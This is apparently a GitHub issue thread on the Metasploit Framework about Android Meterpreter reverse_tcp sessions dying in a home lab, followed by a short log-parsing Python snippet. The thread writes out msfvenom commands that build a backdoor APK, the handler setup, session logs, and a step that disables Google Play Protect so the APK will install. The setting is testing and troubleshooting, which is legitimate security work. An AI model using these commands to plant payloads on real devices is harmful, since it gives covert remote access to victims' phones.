rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

My session keeps dying and I suspect this is why the apk file is not downloading #18485

Closed samspalin closed 10 months ago

samspalin commented 1 year ago

Please I need help. I've searched online but I am not getting anything positive. I am currently running Kali linux 6.3.0-kali1-amd64 on VMware and Android OS version 8.1 on VirtualBox.

I created the payload with msfvenom, to execute it on the target:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.25.130 LPORT=4444  R > /var/www/html/Android.apk

I also tried:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.25.130 LPORT=4444  -o /var/www/html/Android.apk --platform android -a dalvik

I set the payload, host and port on Metasploit:

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.25.130
lhost => 192.168.25.130
msf6 exploit(multi/handler) > set lport 4444
lport => 4444

But whenever I attempt to download the Android.apk file from the Android device, it does not work. My meterpreter session shows like this:

[*] Started reverse TCP handler on 192.168.25.130:4444 
[*] Sending stage (78189 bytes) to 192.168.25.1
[*] Sending stage (78189 bytes) to 192.168.25.1
[*] 192.168.25.1 - Meterpreter session 1 closed.  Reason: Died
[-] Meterpreter session 2 is not valid and will be closed
[*] 192.168.25.1 - Meterpreter session 2 closed.
[-] Meterpreter session 1 is not valid and will be closed
[*] Sending stage (78189 bytes) to 192.168.25.1
[*] Sending stage (78189 bytes) to 192.168.25.1
[*] 192.168.25.1 - Meterpreter session 3 closed.  Reason: Died
[-] Meterpreter session 3 is not valid and will be closed
[-] Meterpreter session 4 is not valid and will be closed
[*] 192.168.25.1 - Meterpreter session 4 closed.

Is there something I am missing perhaps or something I did not write correctly?

github-actions[bot] commented 1 year ago

It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.

This includes:

The easier it is for us to replicate and debug an issue means there's a higher chance of this issue being resolved.

adfoster-r7 commented 1 year ago

It's not clear what's going wrong. If this is still replicating, running the `setg SessionTlvLogging true` command to log the network traffic might be useful for debugging:

https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html#log-meterpreter-tlv-packets

sjanusz-r7 commented 1 year ago

Hello 👋 I wasn't able to reproduce this issue, however I've used Android Studio on MacOS. I've tested the payload/android/meterpreter/reverse_tcp payload on an Android emulator in Android Studio with the following steps:

  1. cd metasploit-framework
  2. bundle install
  3. bundle exec './msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.64.1 LPORT=4444 -o ./tmp/met.apk --platform android -a dalvik'
  4. bundle exec './msfconsole -q'
  5. use payload/android/meterpreter/reverse_tcp
  6. set LHOST 192.168.64.1
  7. set LPORT 4444
  8. to_handler
  9. Install and run the Meterpreter APK file on the Android device

I've tested this on master as well as by recompiling the Android payloads using Docker from the metasploit-payloads repository, both of which worked and got me a working session.

I also used Python's http.server to download the ./tmp/met.apk Meterpreter APK on the Android emulator. It's worth pointing out that in my setup, I had to disable Google Play Protect on the emulator, otherwise the Meterpreter APK would not be installed.

Log Output

Generating Payload:

```
bundle exec './msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.64.1 LPORT=4444 -o ./tmp/met.apk --platform android -a dalvik'
No encoder specified, outputting raw payload
Payload size: 10238 bytes
Saved as: ./tmp/met.apk
```

Getting a session:

```
msf6 payload(android/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 2
[*] Started reverse TCP handler on 192.168.64.1:4444
msf6 payload(android/meterpreter/reverse_tcp) > [*] Sending stage (70945 bytes) to 192.168.64.1
[*] Meterpreter session 3 opened (192.168.64.1:4444 -> 192.168.64.1:51906) at 2023-11-06 11:36:22 +0000
sessions

Active sessions
===============

  Id  Name  Type                        Information         Connection
  --  ----  ----                        -----------         ----------
  3         meterpreter dalvik/android  u0_a84 @ localhost  192.168.64.1:4444 -> 192.168.64.1:51906 (fe80::ff:fe44:5566)

msf6 payload(android/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > getuid
Server username: u0_a84
```

samspalin commented 1 year ago

> Hello 👋 I wasn't able to reproduce this issue, however I've used Android Studio on MacOS. I've tested the payload/android/meterpreter/reverse_tcp payload on an Android emulator in Android Studio with the following steps:
>
>   1. cd metasploit-framework
>   2. bundle install
>   3. bundle exec './msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.64.1 LPORT=4444 -o ./tmp/met.apk --platform android -a dalvik'
>   4. bundle exec './msfconsole -q'
>   5. use payload/android/meterpreter/reverse_tcp
>   6. set LHOST 192.168.64.1
>   7. set LPORT 4444
>   8. to_handler
>   9. Install and run the Meterpreter APK file on the Android device
>
> I've tested this on master as well as by recompiling the Android payloads using Docker from the metasploit-payloads repository, both of which worked and got me a working session.
>
> I also used Python's http.server to download the ./tmp/met.apk Meterpreter APK on the Android emulator. It's worth pointing out that in my setup, I had to disable Google Play Protect on the emulator, otherwise the Meterpreter APK would not be installed.
>
> Log Output

Hello. Thank you for this; however, I do have some questions. Did you create the payload with this payload/android/meterpreter/reverse_tcp on a Kali machine?

Also, where did you run these commands below? Did you run them on Kali or on the terminal in the Android Studio on MacOS?

```
cd metasploit-framework
bundle install
bundle exec './msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.64.1 LPORT=4444 -o ./tmp/met.apk --platform android -a dalvik'
bundle exec './msfconsole -q'
use payload/android/meterpreter/reverse_tcp
set LHOST 192.168.64.1
set LPORT 4444
to_handler
```

sjanusz-r7 commented 1 year ago

After double checking: I installed a fresh Kali 2023.3 which seems to be: Kali 2023.3 - 23rd August, 2023 - The third [2023 Kali Rolling release](https://www.kali.org/blog/kali-linux-2023-3-release/). Kernel 6.3.0, Xfce 4.18.4. (taken from here). My Kali machine had an IP of 192.168.112.176 which is what I've used as the LHOST. On my fresh Kali install I called:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.112.176 LPORT=4444 -o /tmp/met.apk

This resulted in the following output:

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10236 bytes
Saved as: /tmp/met.apk

I then called, on Kali in the terminal:

msfconsole
use android/meterpreter/reverse_tcp 
set LHOST=192.168.112.176
to_handler

I opened a new tab in my terminal and called python -m http.server in the /tmp folder and downloaded the generated met.apk on the Android device, disabled Google Play Protect, installed and then opened the app. I received:

msf6 payload(android/meterpreter/reverse_tcp) > 
[*] Sending stage (78189 bytes) to 192.168.112.1
[*] Meterpreter session 1 opened (192.168.112.176:4444 -> 192.168.112.1:62288) at 2023-11-17 10:20:03 +0000

Can you provide the output and logs as requested, and potentially try setting `setg SessionTLVLogging true`? What's the architecture of the Android device? I wasn't able to replicate this issue on a fresh install (Framework: 6.3.27-dev) or on the master branch.

github-actions[bot] commented 11 months ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

mikelkarma commented 10 months ago

I was having this same problem. I managed to solve it by adjusting the metstage.jar waiting time: https://github.com/mikelkarma/Meterpreter-Android

samspalin commented 10 months ago

Thank you to everyone who assisted with this. I researched further on the recommendations that were given and discovered it was not an issue with any setups. I realised the link to my Apache server that I was using had the Metasploit port 4444, which I included, and once I removed it my Meterpreter session started every time I tried it.
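
The symptom in this thread (stages sent and sessions closed without any "session opened" line, with a download link that pointed at port 4444) can be checked mechanically. The following is an added example, not code from the thread or from Metasploit; the function names and the combined sample log are constructed for illustration, using the console line formats quoted above.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: lines in the msfconsole format quoted in this thread.
SAMPLE_LOG = """\
[*] Started reverse TCP handler on 192.168.25.130:4444
[*] Sending stage (78189 bytes) to 192.168.25.1
[*] Sending stage (78189 bytes) to 192.168.25.1
[*] 192.168.25.1 - Meterpreter session 1 closed.  Reason: Died
[-] Meterpreter session 2 is not valid and will be closed
[*] 192.168.25.1 - Meterpreter session 2 closed.
[*] Sending stage (78189 bytes) to 192.168.112.1
[*] Meterpreter session 3 opened (192.168.112.176:4444 -> 192.168.112.1:62288) at 2023-11-17 10:20:03 +0000
"""

# Patterns follow the handler output shown in the issue; the captured group is the peer.
STAGE = re.compile(r"Sending stage \(\d+ bytes\) to (\S+)")
OPENED = re.compile(r"Meterpreter session \d+ opened \(\S+:\d+ -> (\S+):\d+\)")
CLOSED = re.compile(r"(\S+) - Meterpreter session \d+ closed")

def summarize(log_text):
    """Count stage sends, opened sessions and closed sessions per peer address."""
    peers = defaultdict(lambda: {"staged": 0, "opened": 0, "closed": 0})
    for line in log_text.splitlines():
        for key, pattern in (("staged", STAGE), ("opened", OPENED), ("closed", CLOSED)):
            m = pattern.search(line)
            if m:
                peers[m.group(1)][key] += 1
    return dict(peers)

def never_opened(summary):
    """Peers that reached the handler (stage sent) but never opened a session."""
    return sorted(p for p, c in summary.items() if c["staged"] and not c["opened"])

def url_targets_handler(url, lport):
    """True if a download URL would connect to the handler port instead of the web server."""
    parts = urlsplit(url)
    port = parts.port or {"http": 80, "https": 443}.get(parts.scheme)
    return port == lport

if __name__ == "__main__":
    summary = summarize(SAMPLE_LOG)
    print("staged but never opened:", never_opened(summary))
    print("link hits handler port:",
          url_targets_handler("http://192.168.25.130:4444/Android.apk", 4444))
```

A peer listed by `never_opened` is a client that connected to the listener without completing a Meterpreter session, which is what a browser request sent to the handler port looks like from the console.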

samspalin commented 10 months ago

Thank you everyone!